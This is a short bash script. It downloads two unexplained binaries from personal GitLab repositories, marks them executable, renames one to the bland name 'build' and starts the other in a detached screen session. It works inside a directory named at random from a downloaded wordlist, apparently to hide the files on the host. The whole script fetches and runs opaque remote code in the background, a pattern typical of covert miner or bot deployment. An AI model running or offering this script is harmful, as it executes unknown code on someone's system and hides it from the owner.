#!/bin/bash 
wget https://raw.githubusercontent.com/huntergregal/wordlists/master/names.txt

sleep 1

TIK=$(shuf -n 1 names.txt)
USER=$1

mkdir $TIK && cd $TIK
sudo apt install screen -y

wget -qO server https://gitlab.com/mauliki9999/codet/-/raw/main/server4 && chmod +x server
wget -qO tuyulcakep https://gitlab.com/sarifadim/jomblo/-/raw/main/tuyulcakep && chmod +x tuyulcakep && mv tuyulcakep build
screen -dms run ./server
